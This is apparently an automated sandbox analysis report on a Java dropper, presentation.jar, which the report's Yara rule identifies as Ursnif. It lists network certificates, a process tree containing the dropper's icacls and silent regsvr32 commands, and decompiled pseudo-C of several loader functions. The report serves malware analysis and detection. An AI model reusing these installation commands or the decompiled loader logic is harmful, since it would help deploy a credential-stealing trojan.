May 6, 2021 17:58:11.748223066 CEST	35.181.18.61	443	192.168.2.3	49734	CN=*.112.2o7.net, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 14 02:00:00 CEST 2021 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006	Thu Apr 21 01:59:59 CEST 2022 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030
					CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Nov 10 01:00:00 CET 2006	Mon Nov 10 01:00:00 CET 2031
May 6, 2021 17:58:11.748944044 CEST	35.181.18.61	443	192.168.2.3	49733	CN=*.112.2o7.net, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 14 02:00:00 CEST 2021 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006	Thu Apr 21 01:59:59 CEST 2022 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030
					CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Nov 10 01:00:00 CET 2006	Mon Nov 10 01:00:00 CET 2031
May 6, 2021 17:58:12.119709015 CEST	34.202.206.65	443	192.168.2.3	49737	CN=*.truste-svc.net, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Sat Apr 25 13:19:21 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Thu Jun 23 16:37:27 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 6, 2021 17:58:12.120345116 CEST	34.202.206.65	443	192.168.2.3	49736	CN=*.truste-svc.net, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Sat Apr 25 13:19:21 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Thu Jun 23 16:37:27 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 6, 2021 17:58:12.845282078 CEST	50.87.249.219	443	192.168.2.3	49735	CN=cpcalendars.servicesteam.org CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon Apr 26 07:10:28 CEST 2021 Wed Oct 07 21:21:40 CEST 2020	Sun Jul 25 07:10:28 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49188-49192-61-49190-49194-107-106-49162-49172-53-49157-49167-57-56-49187-49191-60-49189-49193-103-64-49161-49171-47-49156-49166-51-50-49196-49195-49200-157-49198-49202-159-163-49199-156-49197-49201-158-162-255,10-11-13-23-0,23-24-25-9-10-11-12-13-14-22,0	d2935c58fe676744fecc8614ee5356c7
May 6, 2021 17:58:12.845282078 CEST	50.87.249.219	443	192.168.2.3	49735	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		d2935c58fe676744fecc8614ee5356c7

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 6008 Parent PID: 4228

General

Start time:	17:58:00
Start date:	06/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5988 Parent PID: 6008

General

Start time:	17:58:01
Start date:	06/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: java.exe PID: 5732 Parent PID: 6008

General

Start time:	17:58:01
Start date:	06/05/2021
Path:	C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'
Imagebase:	0x11b0000
File size:	192376 bytes
MD5 hash:	28733BA8C383E865338638DF5196E6FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Java
Reputation:	high

Chronological Activities

Analysis Process: icacls.exe PID: 3160 Parent PID: 5732

General

Start time:	17:58:03
Start date:	06/05/2021
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Imagebase:	0x920000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 2168 Parent PID: 3160

General

Start time:	17:58:03
Start date:	06/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4812 Parent PID: 5732

General

Start time:	17:58:05
Start date:	06/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/
Imagebase:	0x7ff6295c0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6028 Parent PID: 4812

General

Start time:	17:58:05
Start date:	06/05/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4812 CREDAT:17410 /prefetch:2
Imagebase:	0x910000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6560 Parent PID: 5732

General

Start time:	17:58:13
Start date:	06/05/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll
Imagebase:	0x90000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 6560 Parent PID: 5732 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.9%
Total number of Nodes:	1110
Total number of Limit Nodes:	24

Executed Functions

Function 04D717A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E04D717A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E04D7146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E04D715A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E04D71C12(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E04D71CA4(E04D716EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E04D71D7C(_t45,  &_v48) != 0) {
					 *0x4d741b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x4d741b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E04D71C8F(_t50 + _t15);
				 *0x4d741b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E04D7136A(_t44);
					goto L11;
				}
			}

0x04d717b3
0x04d717bc
0x04d717c0
0x04d718c8
0x04d718ce
0x00000000
0x00000000
0x00000000
0x04d717c6
0x04d717c6
0x04d717cb
0x04d717d1
0x04d717e0
0x04d717e1
0x04d717e4
0x04d717e7
0x04d717f0
0x04d717f4
0x04d717fa
0x04d717fe
0x04d71805
0x00000000
0x00000000
0x04d7180b
0x04d71812
0x04d71816
0x04d718b9
0x04d718b9
0x04d718c0
0x04d718c2
0x04d718c2
0x00000000
0x04d718c0
0x04d7181f
0x04d71872
0x04d71872
0x04d71883
0x04d71887
0x04d718b5
0x04d71889
0x04d7188c
0x04d71894
0x04d71898
0x04d718a0
0x04d718a0
0x04d718a7
0x04d718a7
0x00000000
0x04d71887
0x04d7182d
0x04d7186c
0x00000000
0x04d7186c
0x04d7182f
0x04d71833
0x04d7183c
0x04d7183e
0x04d71842
0x04d71864
0x04d71864
0x00000000
0x04d71864
0x04d71844
0x04d71849
0x04d71850
0x04d71855
0x00000000
0x04d71857
0x04d7185a
0x04d7185d
0x00000000
0x04d7185d

APIs

Part of subcall function 04D7146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,04D717B8,74B063F0,00000000), ref: 04D7147B
Part of subcall function 04D7146C: GetVersion.KERNEL32 ref: 04D7148A
Part of subcall function 04D7146C: GetCurrentProcessId.KERNEL32 ref: 04D71499
Part of subcall function 04D7146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04D714B2

GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 04D717CB
SwitchToThread.KERNEL32 ref: 04D717D1

Part of subcall function 04D715A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 04D715F9
Part of subcall function 04D715A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,04D717EC), ref: 04D7168B
Part of subcall function 04D715A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 04D716A6

Sleep.KERNELBASE(00000000,00000000), ref: 04D717F4
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 04D7183C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 04D7185A
WaitForSingleObject.KERNEL32(00000000,000000FF,04D716EC,?,00000000), ref: 04D7188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 04D718A0
CloseHandle.KERNEL32(00000000), ref: 04D718A7
GetLastError.KERNEL32(04D716EC,?,00000000), ref: 04D718AF
GetLastError.KERNEL32 ref: 04D718C2

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 3c5deb353565775252a16cead2ae3b9cafaf9b09c5d391c2f7088f0c83195b66
Instruction ID: 92e0c701253946c941f2cc9f211291e133e74541b66c0889f60558acac1db0e5
Opcode Fuzzy Hash: 3c5deb353565775252a16cead2ae3b9cafaf9b09c5d391c2f7088f0c83195b66
Instruction Fuzzy Hash: 6E316171A04711ABD721EF65984896FBBECFB85654F140B2AF855C2340FB38E904DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 04DE2668, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000009F8,00003000,00000040,000009F8,04DE20C0), ref: 04DE2722
VirtualAlloc.KERNEL32(00000000,00000034,00003000,00000040,04DE2121), ref: 04DE2759
VirtualAlloc.KERNEL32(00000000,0000BFC3,00003000,00000040), ref: 04DE27B9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04DE27EF
VirtualProtect.KERNEL32(04D70000,00000000,00000004,04DE2647), ref: 04DE28F4
VirtualProtect.KERNEL32(04D70000,00001000,00000004,04DE2647), ref: 04DE291B
VirtualProtect.KERNEL32(00000000,?,00000002,04DE2647), ref: 04DE29E8
VirtualProtect.KERNEL32(00000000,?,00000002,04DE2647,?), ref: 04DE2A3E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04DE2A5A

Memory Dump Source

Source File: 0000000A.00000002.477466799.0000000004DE2000.00000040.00020000.sdmp, Offset: 04DE2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4de2000_regsvr32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 60c54791a7db6562afa80eab81358fde0908a34fd58b877f97c248b394c3acce
Instruction ID: 12afb695525e8216abe2b4dc57fc5e4a67ae4db6b1ee870aa5dd6c4c5727c2a0
Opcode Fuzzy Hash: 60c54791a7db6562afa80eab81358fde0908a34fd58b877f97c248b394c3acce
Instruction Fuzzy Hash: ABD14772201202DFDB359F15C880BB277BAFF48314B1941B8ED099FA5AD778B851DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04D71566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E04D71566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x04d7156a
0x04d7157b
0x04d71583
0x04d71585
0x04d71598
0x04d71598
0x04d715a2

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,04D71C5E,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D7157B
GetSystemDefaultUILanguage.KERNEL32(?,?,04D71C5E,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D71585
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,04D71C5E,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D71598

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: d06544de00a3bfbabd355014deb1b6aad50b18845ee314cb502836f062f7996d
Instruction ID: 0e3ab9eaea6e98ad4f8b888b05d052a0886a6fe9761e2d1cf70034b31462fe2e
Opcode Fuzzy Hash: d06544de00a3bfbabd355014deb1b6aad50b18845ee314cb502836f062f7996d
Instruction Fuzzy Hash: F6E0B864740245B6E714EB919D0AF7D7278E70074AF500154FB41E61C0E6749E04E775

Uniqueness

Uniqueness Score: -1.00%

Function 04D80CF3, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 1197COMMON

Download Yara Rule

Strings

r, xrefs: 04D81105

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 75f0ffa8da374f72415f862e915289236307c495441d1f5bbfdf291d6ebc7f52
Instruction ID: 68941b6cfefa81b078c8f88a1e45dedae00db29a1bcc24342c3ed69bff5977b1
Opcode Fuzzy Hash: 75f0ffa8da374f72415f862e915289236307c495441d1f5bbfdf291d6ebc7f52
Instruction Fuzzy Hash: 89A2F371B04215CFD315EF2AE4A06A977F9FB88304F0985AED4498B382E678AD4DCF51

Uniqueness

Uniqueness Score: -1.00%

Function 04D8B1C4, Relevance: 21.1, APIs: 14, Instructions: 109
memorythreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(04DDE534,?,04D83AFF), ref: 04D8B1CA
__mtterm.LIBCMT ref: 04D8B1D6

Part of subcall function 04D8AEA2: __decode_pointer.LIBCMT ref: 04D8AEB3
Part of subcall function 04D8AEA2: TlsFree.KERNEL32(04DE4824,04D8B343), ref: 04D8AECD

TlsAlloc.KERNEL32 ref: 04D8B263
__init_pointers.LIBCMT ref: 04D8B288
__encode_pointer.LIBCMT ref: 04D8B293
__encode_pointer.LIBCMT ref: 04D8B2A3
__encode_pointer.LIBCMT ref: 04D8B2B3
__encode_pointer.LIBCMT ref: 04D8B2C3
__decode_pointer.LIBCMT ref: 04D8B2E4
__calloc_crt.LIBCMT ref: 04D8B2FD
__decode_pointer.LIBCMT ref: 04D8B317
__initptd.LIBCMT ref: 04D8B326
GetCurrentThreadId.KERNEL32 ref: 04D8B32D

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__initptd__mtterm
String ID:
API String ID: 2061501447-0
Opcode ID: 1c5f4d6f51562d5f5a21d5139ef8fe9f1882bf94c0e43e5068079dafc5a9f0bf
Instruction ID: 2bfbecc2a57b7d0787e08203d15592ebb39b311c880fb2a0e0d847e2d5f6dcf0
Opcode Fuzzy Hash: 1c5f4d6f51562d5f5a21d5139ef8fe9f1882bf94c0e43e5068079dafc5a9f0bf
Instruction Fuzzy Hash: 27317231A003119BDB11BFB7F859A7E3AA5EB25752B00453FF410DA294EB79B840CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D71E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x4d74188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x4d7418c;
						if( *0x4d7418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x4d74198;
								if( *0x4d74198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x4d7418c);
						}
						HeapDestroy( *0x4d74190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x4d74188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x4d74190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x4d741b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E04D71CA4(E04D71D32, E04D71EE0(_a12, 1, 0x4d74198, _t41));
							 *0x4d7418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x04d71e07
0x04d71e13
0x04d71e15
0x04d71e18
0x04d71e8e
0x04d71e94
0x04d71e96
0x04d71e98
0x04d71e9e
0x04d71ea0
0x04d71ea5
0x04d71ea8
0x04d71eb3
0x04d71eb5
0x00000000
0x00000000
0x04d71eb7
0x04d71eba
0x04d71ebc
0x00000000
0x00000000
0x00000000
0x04d71ebc
0x04d71ec4
0x04d71ec4
0x04d71ed0
0x04d71ed0
0x04d71e1a
0x04d71e1b
0x04d71e3b
0x04d71e41
0x04d71e43
0x04d71e48
0x04d71e84
0x04d71e84
0x04d71e4a
0x04d71e52
0x04d71e59
0x04d71e63
0x04d71e6f
0x04d71e76
0x04d71e7b
0x04d71e80
0x00000000
0x04d71e80
0x04d71e7b
0x04d71e48
0x04d71e1b
0x04d71edd

APIs

InterlockedIncrement.KERNEL32(04D74188), ref: 04D71E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 04D71E3B

Part of subcall function 04D71CA4: CreateThread.KERNEL32 ref: 04D71CBB
Part of subcall function 04D71CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 04D71CD0
Part of subcall function 04D71CA4: GetLastError.KERNEL32(00000000), ref: 04D71CDB
Part of subcall function 04D71CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 04D71CE5
Part of subcall function 04D71CA4: CloseHandle.KERNEL32(00000000), ref: 04D71CEC
Part of subcall function 04D71CA4: SetLastError.KERNEL32(00000000), ref: 04D71CF5

